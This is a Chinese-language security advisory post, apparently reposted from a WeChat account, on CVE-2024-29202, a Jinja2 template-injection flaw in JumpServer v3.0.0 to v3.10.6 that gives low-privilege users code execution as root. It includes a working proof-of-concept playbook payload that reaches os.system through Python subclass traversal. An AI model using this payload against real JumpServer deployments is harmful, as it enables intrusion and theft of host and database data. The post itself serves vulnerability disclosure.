CVE-2024-29202|JumpServer JINJA2注入代码执行漏洞(POC)

admin 2024年4月2日16:06:05评论32 views字数 775阅读2分35秒阅读模式

0x00 前言

JumpServer是FIT2CLOUD飞致云旗下品牌。

JumpServer开源堡垒机是一款运维安全审计系统产品,提供身份验证、授权控制、账号管理、安全审计等功能支持,帮助企业快速构建运维安全审计能力。

0x01 漏洞描述

具有低权限用户帐户的攻击者可通过构建恶意playbook模板利用Ansible中的Jinja2模板代码注入漏洞在Celery容器中执行任意代码。
由于Celery容器以root权限运行并具有数据库访问权限,因此攻击者可以从所有主机窃取敏感信息或操纵数据库。

0x02 CVE编号

CVE-2024-29202

0x03 影响版本

JumpServer v3.0.0 - v3.10.6

0x04 漏洞详情

POC:

https://wh0am1i.com/2024/03/30/JumpServer-CVE-2024-29201-CVE-2024-29202/

- name: |       {% for x in ().__class__.__base__.__subclasses__() %}         {% if "warning" in x.__name__ %}           {{             x()._module.__builtins__["__import__"]("os").system("id > /tmp/pwnd2")           }}         {%endif%}       {%endfor%}
CVE-2024-29202|JumpServer JINJA2注入代码执行漏洞(POC)

0x05 参考链接

https://wh0am1i.com/2024/03/30/JumpServer-CVE-2024-29201-CVE-2024-29202/

https://github.com/jumpserver/jumpserver/security/advisories/GHSA-2vvr-vmvx-73ch

原文始发于微信公众号(信安百科):CVE-2024-29202|JumpServer JINJA2注入代码执行漏洞(POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月2日16:06:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-29202|JumpServer JINJA2注入代码执行漏洞(POC)https://cn-sec.com/archives/2623737.html

发表评论

匿名网友 填写信息